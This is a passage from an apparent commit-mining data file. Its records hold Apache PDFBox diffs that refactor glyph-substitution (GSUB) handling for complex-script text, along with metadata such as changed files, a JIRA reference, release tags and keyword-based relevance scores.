"+{", - "+", - "+ BENGALI(new String[] { \"bng2\", \"beng\" });", - "+", - "+ private final String[] scriptNames;", - "+", - "+ private Language(String[] scriptNames)", - "+ {", - "+ this.scriptNames = scriptNames;", - "+ }", - "+", - "+ /**", - "+ * ScriptNames form the basis of identification of the language. This method gets the ScriptNames that the given", - "+ * Language supports, in the order of preference, Index 0 being the most preferred. These names should match the", - "+ * {@link ScriptRecord} in the GSUB system.", - "+ */", - "+ public String[] getScriptNames()", - "+ {", - "+ return scriptNames;", - "+ }", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java", - "new file mode 100644", - "index 000000000..a795588ca", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java", - "@@ -0,0 +1,82 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.model;", - "+", - "+import java.util.List;", - "+import java.util.Map;", - "+import java.util.Set;", - "+", - "+/**", - "+ * ", - "+ * A {@link Map} based simple implementation of the {@link GsubData}", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class MapBackedGsubData implements GsubData", - "+{", - "+", - "+ private final Language language;", - "+ private final String activeScriptName;", - "+ private final Map, Integer>> glyphSubstitutionMap;", - "+", - "+ public MapBackedGsubData(Language language, String activeScriptName,", - "+ Map, Integer>> glyphSubstitutionMap)", - "+ {", - "+ this.language = language;", - "+ this.activeScriptName = activeScriptName;", - "+ this.glyphSubstitutionMap = glyphSubstitutionMap;", - "+ }", - "+", - "+ @Override", - "+ public Language getLanguage()", - "+ {", - "+ return language;", - "+ }", - "+", - "+ @Override", - "+ public String getActiveScriptName()", - "+ {", - "+ return activeScriptName;", - "+ }", - "+", - "+ @Override", - "+ public boolean isFeatureSupported(String featureName)", - "+ {", - "+ return glyphSubstitutionMap.containsKey(featureName);", - "+ }", - "+", - "+ @Override", - "+ public ScriptFeature getFeature(String featureName)", - "+ {", - "+ if (!isFeatureSupported(featureName))", - "+ {", - "+ throw new UnsupportedOperationException(", - "+ \"The feature \" + featureName + \" is not supported!\");", - "+ }", - "+", - "+ return new MapBackedScriptFeature(featureName, glyphSubstitutionMap.get(featureName));", - "+ }", - "+", - "+ @Override", - "+ public Set getSupportedFeatures()", - "+ {", - "+ return glyphSubstitutionMap.keySet();", - "+ }", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java", - "new file mode 100644", - "index 000000000..ba2791c14", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java", - "@@ -0,0 +1,122 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.model;", - "+", - "+import java.util.List;", - "+import java.util.Map;", - "+import java.util.Set;", - "+", - "+/**", - "+ * ", - "+ * A {@link Map} based simple implementation of the {@link ScriptFeature}", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public class MapBackedScriptFeature implements ScriptFeature", - "+{", - "+", - "+ private final String name;", - "+ private final Map, Integer> featureMap;", - "+", - "+ public MapBackedScriptFeature(String name, Map, Integer> featureMap)", - "+ {", - "+ this.name = name;", - "+ this.featureMap = featureMap;", - "+ }", - "+", - "+ @Override", - "+ public String getName()", - "+ {", - "+ return name;", - "+ }", - "+", - "+ @Override", - "+ public Set> getAllGlyphIdsForSubstitution()", - "+ {", - "+ return featureMap.keySet();", - "+ }", - "+", - "+ @Override", - "+ public boolean canReplaceGlyphs(List glyphIds)", - "+ {", - "+ return featureMap.containsKey(glyphIds);", - "+ }", - "+", - "+ @Override", - "+ public Integer getReplacementForGlyphs(List glyphIds)", - "+ {", - "+ if (!canReplaceGlyphs(glyphIds))", - "+ {", - "+ throw new UnsupportedOperationException(", - "+ \"The glyphs \" + glyphIds + \" cannot be replaced\");", - "+ }", - "+ return featureMap.get(glyphIds);", - "+ }", - "+", - "+ @Override", - "+ public int hashCode()", - "+ {", - "+ final int prime = 31;", - "+ int result = 1;", - "+ result = prime * result + ((featureMap == null) ? 0 : featureMap.hashCode());", - "+ result = prime * result + ((name == null) ? 0 : name.hashCode());", - "+ return result;", - "+ }", - "+", - "+ @Override", - "+ public boolean equals(Object obj)", - "+ {", - "+ if (this == obj)", - "+ {", - "+ return true;", - "+ }", - "+ if (obj == null)", - "+ {", - "+ return false;", - "+ }", - "+ if (getClass() != obj.getClass())", - "+ {", - "+ return false;", - "+ }", - "+ MapBackedScriptFeature other = (MapBackedScriptFeature) obj;", - "+ if (featureMap == null)", - "+ {", - "+ if (other.featureMap != null)", - "+ {", - "+ return false;", - "+ }", - "+ }", - "+ else if (!featureMap.equals(other.featureMap))", - "+ {", - "+ return false;", - "+ }", - "+ if (name == null)", - "+ {", - "+ if (other.name != null)", - "+ {", - "+ return false;", - "+ }", - "+ }", - "+ else if (!name.equals(other.name))", - "+ {", - "+ return false;", - "+ }", - "+ return true;", - "+ }", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java b/fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java", - "new file mode 100644", - "index 000000000..1efad551b", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java", - "@@ -0,0 +1,42 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.fontbox.ttf.model;", - "+", - "+import java.util.List;", - "+import java.util.Set;", - "+", - "+import org.apache.fontbox.ttf.table.common.FeatureRecord;", - "+", - "+/**", - "+ * Models a {@link FeatureRecord}", - "+ * ", - "+ * @author Palash Ray", - "+ *", - "+ */", - "+public interface ScriptFeature", - "+{", - "+", - "+ String getName();", - "+", - "+ Set> getAllGlyphIdsForSubstitution();", - "+", - "+ boolean canReplaceGlyphs(List glyphIds);", - "+", - "+ Integer getReplacementForGlyphs(List glyphIds);", - "+", - "+}", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html", - "new file mode 100644", - "index 000000000..4878a8b2f", - "--- /dev/null", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html", - "@@ -0,0 +1,25 @@", - "+", - "+", - "+", - "+", - "+", - "+", - "+", - "+This package contains a more logical model for the various font tables like GSUB.", - "+", - "+", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index 50be140c1..af71274ee 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -27,3 +27,2 @@ import java.util.HashSet;", - " import java.util.List;", - "-import java.util.Map;", - " import java.util.Set;", - "@@ -37,3 +36,4 @@ import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", - " import org.apache.fontbox.ttf.gsub.GsubWorker;", - "-import org.apache.fontbox.ttf.gsub.GsubWorkerForBengali;", - "+import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", - "+import org.apache.fontbox.ttf.model.GsubData;", - " import org.apache.pdfbox.contentstream.PDAbstractContentStream;", - "@@ -332,8 +332,7 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " PDType0Font pdType0Font = (PDType0Font) font;", - "- Map, Integer>> glyphSubstitutionMap = pdType0Font", - "- .getGlyphSubstitutionMap();", - "- if (!glyphSubstitutionMap.isEmpty())", - "+ GsubData gsubData = pdType0Font.getGsubData();", - "+ if (gsubData != GsubData.NO_DATA_FOUND)", - " {", - " Set glyphIds = new HashSet<>();", - "- encodedText = encodeForGsub(glyphSubstitutionMap, glyphIds, pdType0Font, text);", - "+ encodedText = encodeForGsub(gsubData, glyphIds, pdType0Font, text);", - " if (pdType0Font.willBeSubset())", - "@@ -1179,3 +1178,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- private byte[] encodeForGsub(Map, Integer>> glyphSubstitutionMap,", - "+ private byte[] encodeForGsub(GsubData gsubData,", - " Set glyphIds, PDType0Font font, String text) throws IOException", - "@@ -1199,3 +1198,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- glyphIds.addAll(applyGSUBRules(out, font, glyphSubstitutionMap, word));", - "+ glyphIds.addAll(applyGSUBRules(out, font, gsubData, word));", - " }", - "@@ -1207,4 +1206,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " private List applyGSUBRules(ByteArrayOutputStream out, PDType0Font font,", - "- Map, Integer>> glyphSubstitutionMap, String word)", - "- throws IOException", - "+ GsubData gsubData, String word) throws IOException", - " {", - "@@ -1225,7 +1223,7 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- // TODO: figure out how to get this language-specific detail up here", - "- GsubWorker gsubWorker = new GsubWorkerForBengali(cmapLookup, glyphSubstitutionMap);", - "+ GsubWorkerFactory gsubWorkerFactory = new GsubWorkerFactory();", - "- List repositionedGlyphIds = gsubWorker.repositionGlyphs(originalGlyphIds);", - "- List glyphIdsAfterGsub = gsubWorker.substituteGlyphs(repositionedGlyphIds);", - "+ GsubWorker gsubWorker = gsubWorkerFactory.getGsubWorker(cmapLookup, gsubData);", - "+", - "+ List glyphIdsAfterGsub = gsubWorker.applyTransforms(originalGlyphIds);", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "index cd205868e..f0e623931 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "@@ -22,6 +22,3 @@ import java.io.IOException;", - " import java.io.InputStream;", - "-import java.util.Collections;", - " import java.util.HashSet;", - "-import java.util.List;", - "-import java.util.Map;", - " import java.util.Set;", - "@@ -34,2 +31,3 @@ import org.apache.fontbox.ttf.TTFParser;", - " import org.apache.fontbox.ttf.TrueTypeFont;", - "+import org.apache.fontbox.ttf.model.GsubData;", - " import org.apache.fontbox.util.BoundingBox;", - "@@ -54,3 +52,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " private final Set noUnicode = new HashSet<>(); ", - "- private final Map, Integer>> glyphSubstitutionMap;", - "+ private final GsubData gsubData;", - " private final CmapLookup cmapLookup;", - "@@ -72,3 +70,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - "- glyphSubstitutionMap = Collections.emptyMap();", - "+ gsubData = GsubData.NO_DATA_FOUND;", - " cmapLookup = null;", - "@@ -106,3 +104,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - "- glyphSubstitutionMap = ttf.getGlyphSubstitutionMap();", - "+ gsubData = ttf.getGsubData();", - " cmapLookup = ttf.getUnicodeCmapLookup();", - "@@ -601,5 +599,5 @@ public class PDType0Font extends PDFont implements PDVectorFont", - "- public Map, Integer>> getGlyphSubstitutionMap()", - "+ public GsubData getGsubData()", - " {", - "- return glyphSubstitutionMap;", - "+ return gsubData;", - " }" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerFactory.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/model/GsubData.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/model/Language.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedGsubData.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/model/MapBackedScriptFeature.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/model/ScriptFeature.java", - "fontbox/src/main/java/org/apache/fontbox/ttf/model/package.html", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "05eea58ba2735a191592c134c942cf46204cc3f6", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525935005, - "hunks": 32, - "message": "PDFBOX-4068: don't override \"common\" functionality - abstract content stream must track subsetting git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831310 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "index 7dd2030c4..8140a4496 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "@@ -20,2 +20,3 @@ import java.awt.Color;", - " import java.awt.geom.AffineTransform;", - "+import java.io.ByteArrayOutputStream;", - " import java.io.Closeable;", - "@@ -24,4 +25,19 @@ import java.io.OutputStream;", - " import java.text.NumberFormat;", - "+import java.util.ArrayList;", - "+import java.util.HashMap;", - "+import java.util.HashSet;", - "+import java.util.List;", - " import java.util.Locale;", - "+import java.util.Map;", - "+import java.util.Set;", - " import java.util.Stack;", - "+import java.util.regex.Pattern;", - "+", - "+import org.apache.commons.logging.Log;", - "+import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.ttf.CmapLookup;", - "+import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", - "+import org.apache.fontbox.ttf.gsub.GsubWorker;", - "+import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", - "+import org.apache.fontbox.ttf.model.GsubData;", - " import org.apache.pdfbox.cos.COSBase;", - "@@ -32,2 +48,3 @@ import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyLis", - " import org.apache.pdfbox.pdmodel.font.PDFont;", - "+import org.apache.pdfbox.pdmodel.font.PDType0Font;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "@@ -46,2 +63,3 @@ import org.apache.pdfbox.pdmodel.graphics.shading.PDShading;", - " import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", - "+import org.apache.pdfbox.pdmodel.graphics.state.RenderingMode;", - " import org.apache.pdfbox.util.Charsets;", - "@@ -57,2 +75,6 @@ abstract class PDAbstractContentStream implements Closeable", - " {", - "+ private static final Log LOG = LogFactory.getLog(PDAbstractContentStream.class);", - "+", - "+ protected final PDDocument document; // may be null", - "+", - " protected final OutputStream outputStream;", - "@@ -70,9 +92,15 @@ abstract class PDAbstractContentStream implements Closeable", - "+ private final Map gsubWorkers = new HashMap<>();", - "+ private final GsubWorkerFactory gsubWorkerFactory = new GsubWorkerFactory();", - "+", - " /**", - " * Create a new appearance stream.", - "- * ", - "+ *", - "+ * @param document may be null", - " * @param outputStream The appearances output stream to write to.", - "+ * @param resources The resources to use", - " */", - "- PDAbstractContentStream(OutputStream outputStream, PDResources resources)", - "+ PDAbstractContentStream(PDDocument document, OutputStream outputStream, PDResources resources)", - " {", - "+ this.document = document;", - " this.outputStream = outputStream;", - "@@ -147,2 +175,28 @@ abstract class PDAbstractContentStream implements Closeable", - "+ // keep track of fonts which are configured for subsetting", - "+ if (font.willBeSubset())", - "+ {", - "+ if (document != null)", - "+ {", - "+ document.getFontsToSubset().add(font);", - "+ }", - "+ else", - "+ {", - "+ LOG.warn(\"attempting to use subset font \" + font.getName() + \" without proper context\");", - "+ }", - "+ }", - "+", - "+ // complex text layout", - "+ if (font instanceof PDType0Font)", - "+ {", - "+ PDType0Font pdType0Font = (PDType0Font) font;", - "+ GsubData gsubData = pdType0Font.getGsubData();", - "+ if (gsubData != GsubData.NO_DATA_FOUND)", - "+ {", - "+ GsubWorker gsubWorker = gsubWorkerFactory.getGsubWorker(pdType0Font.getCmapLookup(),", - "+ gsubData);", - "+ gsubWorkers.put((PDType0Font) font, gsubWorker);", - "+ }", - "+ }", - "+", - " writeOperand(resources.add(font));", - "@@ -221,2 +275,25 @@ abstract class PDAbstractContentStream implements Closeable", - "+ // complex text layout", - "+ byte[] encodedText = null;", - "+ if (font instanceof PDType0Font)", - "+ {", - "+", - "+ GsubWorker gsubWorker = gsubWorkers.get(font);", - "+ if (gsubWorker != null)", - "+ {", - "+ PDType0Font pdType0Font = (PDType0Font) font;", - "+ Set glyphIds = new HashSet<>();", - "+ encodedText = encodeForGsub(gsubWorker, glyphIds, pdType0Font, text);", - "+ if (pdType0Font.willBeSubset())", - "+ {", - "+ pdType0Font.addGlyphsToSubset(glyphIds);", - "+ }", - "+ }", - "+ }", - "+", - "+ if (encodedText == null)", - "+ {", - "+ encodedText = font.encode(text);", - "+ }", - "+", - " // Unicode code points to keep when subsetting", - "@@ -232,3 +309,3 @@ abstract class PDAbstractContentStream implements Closeable", - "- COSWriter.writeString(font.encode(text), outputStream);", - "+ COSWriter.writeString(encodedText, outputStream);", - " }", - "@@ -1536,2 +1613,84 @@ abstract class PDAbstractContentStream implements Closeable", - " }", - "+", - "+ /**", - "+ * Set the text rendering mode. This determines whether showing text shall cause glyph outlines", - "+ * to be stroked, filled, used as a clipping boundary, or some combination of the three.", - "+ *", - "+ * @param rm The text rendering mode.", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ public void setRenderingMode(RenderingMode rm) throws IOException", - "+ {", - "+ writeOperand(rm.intValue());", - "+ writeOperator(\"Tr\");", - "+ }", - "+", - "+ /**", - "+ * Set the text rise value, i.e. move the baseline up or down. This is useful for drawing", - "+ * superscripts or subscripts.", - "+ *", - "+ * @param rise Specifies the distance, in unscaled text space units, to move the baseline up or", - "+ * down from its default location. 0 restores the default location.", - "+ * @throws IOException", - "+ */", - "+ public void setTextRise(float rise) throws IOException", - "+ {", - "+ writeOperand(rise);", - "+ writeOperator(\"Ts\");", - "+ }", - "+", - "+ private byte[] encodeForGsub(GsubWorker gsubWorker,", - "+ Set glyphIds, PDType0Font font, String text) throws IOException", - "+ {", - "+", - "+ String spaceRegexPattern = \"\\\\s\";", - "+ Pattern spaceRegex = Pattern.compile(spaceRegexPattern);", - "+", - "+ // break the entire chunk of text into words by splitting it with space", - "+ List words = new CompoundCharacterTokenizer(\"\\\\s\").tokenize(text);", - "+", - "+ ByteArrayOutputStream out = new ByteArrayOutputStream();", - "+", - "+ for (String word : words)", - "+ {", - "+ if (spaceRegex.matcher(word).matches())", - "+ {", - "+ out.write(font.encode(word));", - "+ }", - "+ else", - "+ {", - "+ glyphIds.addAll(applyGSUBRules(gsubWorker, out, font, word));", - "+ }", - "+ }", - "+", - "+ return out.toByteArray();", - "+ }", - "+", - "+ private List applyGSUBRules(GsubWorker gsubWorker, ByteArrayOutputStream out, PDType0Font font, String word) throws IOException", - "+ {", - "+ List originalGlyphIds = new ArrayList<>();", - "+ CmapLookup cmapLookup = font.getCmapLookup();", - "+", - "+ // convert characters into glyphIds", - "+ for (char unicodeChar : word.toCharArray())", - "+ {", - "+ int glyphId = cmapLookup.getGlyphId(unicodeChar);", - "+ if (glyphId <= 0)", - "+ {", - "+ throw new IllegalStateException(", - "+ \"could not find the glyphId for the character: \" + unicodeChar);", - "+ }", - "+ originalGlyphIds.add(glyphId);", - "+ }", - "+", - "+ List glyphIdsAfterGsub = gsubWorker.applyTransforms(originalGlyphIds);", - "+", - "+ for (Integer glyphId : glyphIdsAfterGsub)", - "+ {", - "+ out.write(font.encodeGlyphId(glyphId));", - "+ }", - "+", - "+ return glyphIdsAfterGsub;", - "+", - "+ }", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "index ce4ef3305..a4dfc0e26 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "@@ -58,3 +58,3 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", - " {", - "- super(outputStream, appearance.getResources());", - "+ super(null, outputStream, appearance.getResources());", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "index e95a6a0af..276e63e9c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "@@ -36,3 +36,3 @@ public final class PDFormContentStream extends PDAbstractContentStream", - " {", - "- super(form.getContentStream().createOutputStream(), form.getResources());", - "+ super(null, form.getContentStream().createOutputStream(), form.getResources());", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index bb98b7ff7..f5307183c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -20,3 +20,2 @@ import java.awt.geom.AffineTransform;", - " import java.awt.geom.PathIterator;", - "-import java.io.ByteArrayOutputStream;", - " import java.io.Closeable;", - "@@ -24,9 +23,2 @@ import java.io.IOException;", - " import java.io.OutputStream;", - "-import java.util.ArrayList;", - "-import java.util.HashMap;", - "-import java.util.HashSet;", - "-import java.util.List;", - "-import java.util.Map;", - "-import java.util.Set;", - "-import java.util.regex.Pattern;", - "@@ -34,7 +26,2 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "-import org.apache.fontbox.ttf.CmapLookup;", - "-import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", - "-import org.apache.fontbox.ttf.gsub.GsubWorker;", - "-import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", - "-import org.apache.fontbox.ttf.model.GsubData;", - " import org.apache.pdfbox.cos.COSArray;", - "@@ -42,7 +29,4 @@ import org.apache.pdfbox.cos.COSBase;", - " import org.apache.pdfbox.cos.COSName;", - "-import org.apache.pdfbox.pdfwriter.COSWriter;", - " import org.apache.pdfbox.pdmodel.common.PDStream;", - " import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyList;", - "-import org.apache.pdfbox.pdmodel.font.PDFont;", - "-import org.apache.pdfbox.pdmodel.font.PDType0Font;", - " import org.apache.pdfbox.pdmodel.graphics.PDXObject;", - "@@ -56,4 +40,2 @@ import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", - " import org.apache.pdfbox.pdmodel.graphics.image.PDInlineImage;", - "-import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", - "-import org.apache.pdfbox.pdmodel.graphics.state.RenderingMode;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "@@ -100,7 +82,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- private final PDDocument document;", - "-", - "- private final Map gsubWorkers = new HashMap<>();", - "- private final GsubWorkerFactory gsubWorkerFactory = new GsubWorkerFactory();", - "-", - " /**", - "@@ -160,3 +137,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- super(stream.createOutputStream(compress ? COSName.FLATE_DECODE : null), resources);", - "+ super(document, stream.createOutputStream(compress ? COSName.FLATE_DECODE : null), resources);", - "@@ -168,4 +145,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- this.document = document;", - "-", - " // If request specifies the need to append/prepend to the document", - "@@ -256,47 +231,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- super(outputStream, appearance.getResources());", - "- this.document = doc;", - "- ", - "- //setResources(appearance.getResources());", - "- }", - "-", - "- /**", - "- * Set the font and font size to draw text with.", - "- *", - "- * @param font The font to use.", - "- * @param fontSize The font size to draw the text.", - "- * @throws IOException If there is an error writing the font information.", - "- */", - "- @Override", - "- public void setFont(PDFont font, float fontSize) throws IOException", - "- {", - "- if (fontStack.isEmpty())", - "- {", - "- fontStack.add(font);", - "- }", - "- else", - "- {", - "- fontStack.setElementAt(font, fontStack.size() - 1);", - "- }", - "- ", - "- if (font.willBeSubset())", - "- {", - "- document.getFontsToSubset().add(font);", - "- }", - "- ", - "- if (font instanceof PDType0Font)", - "- {", - "- PDType0Font pdType0Font = (PDType0Font) font;", - "- GsubData gsubData = pdType0Font.getGsubData();", - "- if (gsubData != GsubData.NO_DATA_FOUND)", - "- {", - "- GsubWorker gsubWorker = gsubWorkerFactory.getGsubWorker(pdType0Font.getCmapLookup(),", - "- gsubData);", - "- gsubWorkers.put((PDType0Font) font, gsubWorker);", - "- }", - "- }", - "-", - "- writeOperand(resources.add(font));", - "- writeOperand(fontSize);", - "- writeOperator(\"Tf\");", - "+ super(doc, outputStream, appearance.getResources());", - " }", - "@@ -316,61 +247,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- /**", - "- * Outputs a string using the correct encoding and subsetting as required.", - "- *", - "- * @param text The Unicode text to show.", - "- * ", - "- * @throws IOException If an io exception occurs.", - "- */", - "- @Override", - "- protected void showTextInternal(String text) throws IOException", - "- {", - "- if (!inTextMode)", - "- {", - "- throw new IllegalStateException(\"Must call beginText() before showText()\");", - "- }", - "-", - "- if (fontStack.isEmpty())", - "- {", - "- throw new IllegalStateException(\"Must call setFont() before showText()\");", - "- }", - "-", - "- PDFont font = fontStack.peek();", - "-", - "- byte[] encodedText = null;", - "-", - "- if (font instanceof PDType0Font)", - "- {", - "-", - "- GsubWorker gsubWorker = gsubWorkers.get(font);", - "- if (gsubWorker != null)", - "- {", - "- PDType0Font pdType0Font = (PDType0Font) font;", - "- Set glyphIds = new HashSet<>();", - "- encodedText = encodeForGsub(gsubWorker, glyphIds, pdType0Font, text);", - "- if (pdType0Font.willBeSubset())", - "- {", - "- pdType0Font.addGlyphsToSubset(glyphIds);", - "- }", - "- }", - "- }", - "-", - "- if (encodedText == null)", - "- {", - "- encodedText = font.encode(text);", - "- }", - "-", - "- // Unicode code points to keep when subsetting", - "- if (font.willBeSubset())", - "- {", - "- for (int offset = 0; offset < text.length(); )", - "- {", - "- int codePoint = text.codePointAt(offset);", - "- font.addToSubset(codePoint);", - "- offset += Character.charCount(codePoint);", - "- }", - "- }", - "-", - "- COSWriter.writeString(encodedText, outputStream);", - "- }", - "-", - " /**", - "@@ -588,46 +460,2 @@ public final class PDPageContentStream extends 